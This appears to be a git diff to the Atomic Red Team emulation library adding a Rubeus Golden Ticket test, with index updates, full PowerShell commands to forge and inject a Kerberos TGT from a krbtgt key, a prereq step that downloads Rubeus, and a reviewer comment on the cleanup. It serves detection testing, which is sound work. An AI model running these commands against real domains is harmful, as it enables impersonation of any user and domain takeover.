diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 2b21d515..422b0753 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -29,6 +29,7 @@ credential-access,T1187,Forced Authentication,1,PetitPotam,485ce873-2e65-4706-9c
credential-access,T1056.002,GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash
credential-access,T1056.002,GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell
credential-access,T1558.001,Golden Ticket,1,Crafting Active Directory golden tickets with mimikatz,9726592a-dabc-4d4d-81cd-44070008b3af,powershell
+credential-access,T1558.001,Golden Ticket,2,Crafting Active Directory golden tickets with Rubeus,e42d33cd-205c-4acf-ab59-a9f38f6bad9c,powershell
credential-access,T1552.006,Group Policy Preferences,1,GPP Passwords (findstr),870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f,command_prompt
credential-access,T1552.006,Group Policy Preferences,2,GPP Passwords (Get-GPPPassword),e9584f82-322c-474a-b831-940fd8b4455c,powershell
credential-access,T1558.003,Kerberoasting,1,Request for service tickets,3f987809-3681-43c8-bcd8-b3ff3a28533a,powershell
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 4172b393..81a02ce8 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -17,6 +17,7 @@ credential-access,T1003.006,DCSync,1,DCSync (Active Directory),129efd28-8497-4c8
credential-access,T1187,Forced Authentication,1,PetitPotam,485ce873-2e65-4706-9c7e-ae3ab9e14213,powershell
credential-access,T1056.002,GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell
credential-access,T1558.001,Golden Ticket,1,Crafting Active Directory golden tickets with mimikatz,9726592a-dabc-4d4d-81cd-44070008b3af,powershell
+credential-access,T1558.001,Golden Ticket,2,Crafting Active Directory golden tickets with Rubeus,e42d33cd-205c-4acf-ab59-a9f38f6bad9c,powershell
credential-access,T1552.006,Group Policy Preferences,1,GPP Passwords (findstr),870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f,command_prompt
credential-access,T1552.006,Group Policy Preferences,2,GPP Passwords (Get-GPPPassword),e9584f82-322c-474a-b831-940fd8b4455c,powershell
credential-access,T1558.003,Kerberoasting,1,Request for service tickets,3f987809-3681-43c8-bcd8-b3ff3a28533a,powershell
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 69419661..b16940e6 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -51,6 +51,7 @@
- Atomic Test #2: PowerShell - Prompt User for Password [windows]
- [T1558.001 Golden Ticket](../../T1558.001/T1558.001.md)
- Atomic Test #1: Crafting Active Directory golden tickets with mimikatz [windows]
+ - Atomic Test #2: Crafting Active Directory golden tickets with Rubeus [windows]
- [T1552.006 Group Policy Preferences](../../T1552.006/T1552.006.md)
- Atomic Test #1: GPP Passwords (findstr) [windows]
- Atomic Test #2: GPP Passwords (Get-GPPPassword) [windows]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index cf99f845..64d0eb39 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -35,6 +35,7 @@
- Atomic Test #2: PowerShell - Prompt User for Password [windows]
- [T1558.001 Golden Ticket](../../T1558.001/T1558.001.md)
- Atomic Test #1: Crafting Active Directory golden tickets with mimikatz [windows]
+ - Atomic Test #2: Crafting Active Directory golden tickets with Rubeus [windows]
- [T1552.006 Group Policy Preferences](../../T1552.006/T1552.006.md)
- Atomic Test #1: GPP Passwords (findstr) [windows]
- Atomic Test #2: GPP Passwords (Get-GPPPassword) [windows]
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index c204df0a..6e8e9100 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -2156,7 +2156,8 @@ credential-access:
type: String
default: goldenticketfakeuser
krbtgt_aes256_key:
- description: Krbtgt AES256 key
+ description: Krbtgt AES256 key (you will need to set to match your krbtgt
+ key for your domain)
type: String
default: b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9
mimikatz_path:
@@ -2208,6 +2209,90 @@ credential-access:
loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content
$env:TEMP\\golden.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\golden.bat
-ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n"
+ - name: Crafting Active Directory golden tickets with Rubeus
+ auto_generated_guid: e42d33cd-205c-4acf-ab59-a9f38f6bad9c
+ description: |
+ Once the hash of the special krbtgt user is retrieved it is possible to craft Kerberos Ticket Granting Ticket impersonating any user in the Active Directory domain.
+ This test crafts a Golden Ticket and then performs an SMB request with it for the SYSVOL share, thus triggering a service ticket request (event ID 4769).
+ The generated ticket is injected in a new empty Windows session and discarded after, so it does not pollute the current Windows session.
+ supported_platforms:
+ - windows
+ input_arguments:
+ domaincontroller:
+ description: Targeted Active Directory domain FQDN
+ type: String
+ default: $ENV:logonserver.TrimStart('\') + "." + "$ENV:userdnsdomain"
+ account:
+ description: Account to impersonate
+ type: String
+ default: "$ENV:username"
+ krbtgt_aes256_key:
+ description: Krbtgt AES256 key (you will need to set to match your krbtgt
+ key for your domain)
+ type: String
+ default: b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9
+ local_folder:
+ description: Local path of Rubeus executable
+ type: Path
+ default: "$Env:temp"
+ local_executable:
+ description: name of the rubeus executable
+ type: String
+ default: rubeus.exe
+ rubeus_url:
+ description: URL of Rubeus executable
+ type: Url
+ default: https://github.com/morgansec/Rubeus/raw/de21c6607e9a07182a2d2eea20bb67a22d3fbf95/Rubeus/bin/Debug/Rubeus45.exe
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'Computer must be domain joined
+
+'
+ prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain)
+ {exit 0} else {exit 1}
+
+'
+ get_prereq_command: 'Write-Host Joining this computer to a domain must be
+ done manually
+
+'
+ - description: 'Rubeus must exist
+
+'
+ prereq_command: 'if(Test-Path -Path #{local_folder}\#{local_executable}) {exit
+ 0} else {exit 1}
+
+'
+ get_prereq_command: 'Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable}
+
+'
+ executor:
+ name: powershell
+ elevation_required: false
+ command: "Remove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item
+ $env:TEMP\\golden.txt -ErrorAction Ignore\n\ncmd.exe /c \"#{local_folder}\\#{local_executable}\"
+ golden /aes256:#{krbtgt_aes256_key} /ldap /user:#{account} /dc:$(#{domaincontroller})
+ /printcmd /outfile:golden\n$filename = (Get-ChildItem | ? {$_.Name.startswith(\"golden_\")}
+ | Sort-Object -Descending -Property LastWriteTime | select -First 1).Name\n\n#
+ create batch file with commands to run in a separate \"runas /netonly\"
+ session\n# so we don't purge Kerberos ticket from the current Windows session\n#
+ its output goes to golden.txt temp file, because we cannot capture \"runas
+ /netonly\" output otherwise\n@\"\n>%TEMP%\\golden.txt 2>&1 (\n echo Purge
+ existing tickets and create golden ticket:\n klist purge\n cd %temp%\n
+ \ \"#{local_folder}\\#{local_executable}\" ptt /ticket:kirbifile\n\n echo.\n
+ \ echo Requesting SYSVOL:\n dir \\\\$(#{domaincontroller})\\SYSVOL\n \n
+ \ echo.\n echo Tickets after requesting SYSVOL:\n klist\n\n echo.\n echo
+ End of Golden Ticket attack\n)\n\"@ -Replace \"kirbifile\", $filename |
+ Out-File -Encoding OEM $env:TEMP\\golden.bat\n\n# run batch file in a new
+ empty session (password and username do not matter)\necho \"foo\" | runas
+ /netonly /user:fake \"$env:TEMP\\golden.bat\" | Out-Null\n\n# wait until
+ the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait
+ a bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\golden.txt\"
+ -Wait | ForEach-Object {\n if ($_ -match 'End of Golden Ticket attack')
+ { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n#
+ show output from new empty session\nGet-Content $env:TEMP\\golden.txt\n\n#
+ cleanup temp files\nRemove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item
+ $env:TEMP\\golden.txt -ErrorAction Ignore\n"
T1552.006:
technique:
external_references:
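Review bot: The cleanup at the end of the new executor command removes only golden.bat and golden.txt, while the forged ticket file Rubeus writes with `/outfile:golden` (the `golden_*` file captured into `$filename`) is left on disk in the working directory; adding `Remove-Item $filename -ErrorAction Ignore` to the cleanup would keep the test from leaving a usable TGT behind. That ticket is also written to PowerShell's current directory, but the batch file does `cd %temp%` before `ptt /ticket:kirbifile`, so it appears the two only agree when the test is launched from %TEMP% — writing the ticket with an absolute path would remove that dependency. The `domaincontroller` input is described as "Targeted Active Directory domain FQDN" although its default builds the logon server's FQDN; `description: FQDN of the domain controller to target (defaults to the current logon server)` would match the value. The Rubeus prereq check uses an unquoted `Test-Path -Path #{local_folder}\#{local_executable}` whereas the executor quotes the same path, so a folder containing spaces would fail the check but not the command; `Test-Path -Path "#{local_folder}\#{local_executable}"` keeps them consistent. Since index.yaml is regenerated from the technique's source YAML, which is not in this diff, these fixes belong there.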
diff --git a/atomics/T1558.001/T1558.001.md b/atomics/T1558.001/T1558.001.md
index 80ee7b38..244bd599 100644
--- a/atomics/T1558.001/T1558.001.md
+++ b/atomics/T1558.001/T1558.001.md
@@ -10,6 +10,8 @@ The KDC service runs all on domain controllers that are part of an Active Direct
- [Atomic Test #1 - Crafting Active Directory golden tickets with mimikatz](#atomic-test-1---crafting-active-directory-golden-tickets-with-mimikatz)
+- [Atomic Test #2 - Crafting Active Directory golden tickets with Rubeus](#atomic-test-2---crafting-active-directory-golden-tickets-with-rubeus)
+
@@ -33,7 +35,7 @@ The generated ticket is injected in a new empty Windows session and discarded af
| domain_sid | SID of the targeted domain, if you keep default it will automatically get the current domain SID | String | S-1-5-21-DEFAULT|
| domain | Targeted Active Directory domain FQDN | String | %userdnsdomain%|
| account | Account to impersonate | String | goldenticketfakeuser|
-| krbtgt_aes256_key | Krbtgt AES256 key | String | b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9|
+| krbtgt_aes256_key | Krbtgt AES256 key (you will need to set to match your krbtgt key for your domain) | String | b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9|
| mimikatz_path | Mimikatz windows executable | Path | $env:TEMP\mimikatz\x64\mimikatz.exe|
@@ -117,4 +119,110 @@ Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
+
+
+
+## Atomic Test #2 - Crafting Active Directory golden tickets with Rubeus
+Once the hash of the special krbtgt user is retrieved it is possible to craft Kerberos Ticket Granting Ticket impersonating any user in the Active Directory domain.
+This test crafts a Golden Ticket and then performs an SMB request with it for the SYSVOL share, thus triggering a service ticket request (event ID 4769).
+The generated ticket is injected in a new empty Windows session and discarded after, so it does not pollute the current Windows session.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** e42d33cd-205c-4acf-ab59-a9f38f6bad9c
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| domaincontroller | Targeted Active Directory domain FQDN | String | $ENV:logonserver.TrimStart('\') + "." + "$ENV:userdnsdomain"|
+| account | Account to impersonate | String | $ENV:username|
+| krbtgt_aes256_key | Krbtgt AES256 key (you will need to set to match your krbtgt key for your domain) | String | b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9|
+| local_folder | Local path of Rubeus executable | Path | $Env:temp|
+| local_executable | name of the rubeus executable | String | rubeus.exe|
+| rubeus_url | URL of Rubeus executable | Url | https://github.com/morgansec/Rubeus/raw/de21c6607e9a07182a2d2eea20bb67a22d3fbf95/Rubeus/bin/Debug/Rubeus45.exe|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+Remove-Item $env:TEMP\golden.bat -ErrorAction Ignore
+Remove-Item $env:TEMP\golden.txt -ErrorAction Ignore
+
+cmd.exe /c "#{local_folder}\#{local_executable}" golden /aes256:#{krbtgt_aes256_key} /ldap /user:#{account} /dc:$(#{domaincontroller}) /printcmd /outfile:golden
+$filename = (Get-ChildItem | ? {$_.Name.startswith("golden_")} | Sort-Object -Descending -Property LastWriteTime | select -First 1).Name
+
+# create batch file with commands to run in a separate "runas /netonly" session
+# so we don't purge Kerberos ticket from the current Windows session
+# its output goes to golden.txt temp file, because we cannot capture "runas /netonly" output otherwise
+@"
+>%TEMP%\golden.txt 2>&1 (
+ echo Purge existing tickets and create golden ticket:
+ klist purge
+ cd %temp%
+ "#{local_folder}\#{local_executable}" ptt /ticket:kirbifile
+
+ echo.
+ echo Requesting SYSVOL:
+ dir \\$(#{domaincontroller})\SYSVOL
+
+ echo.
+ echo Tickets after requesting SYSVOL:
+ klist
+
+ echo.
+ echo End of Golden Ticket attack
+)
+"@ -Replace "kirbifile", $filename | Out-File -Encoding OEM $env:TEMP\golden.bat
+
+# run batch file in a new empty session (password and username do not matter)
+echo "foo" | runas /netonly /user:fake "$env:TEMP\golden.bat" | Out-Null
+
+# wait until the output file has logged the entire attack
+do {
+ Start-Sleep 1 # wait a bit so the output file has time to be created
+ Get-Content -Path "$env:TEMP\golden.txt" -Wait | ForEach-Object {
+ if ($_ -match 'End of Golden Ticket attack') { break }
+ }
+} while ($false) # dummy loop so that 'break' can be used
+
+# show output from new empty session
+Get-Content $env:TEMP\golden.txt
+
+# cleanup temp files
+Remove-Item $env:TEMP\golden.bat -ErrorAction Ignore
+Remove-Item $env:TEMP\golden.txt -ErrorAction Ignore
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: Computer must be domain joined
+##### Check Prereq Commands:
+```powershell
+if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Write-Host Joining this computer to a domain must be done manually
+```
+##### Description: Rubeus must exist
+##### Check Prereq Commands:
+```powershell
+if(Test-Path -Path #{local_folder}\#{local_executable}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable}
+```
+
+
+
+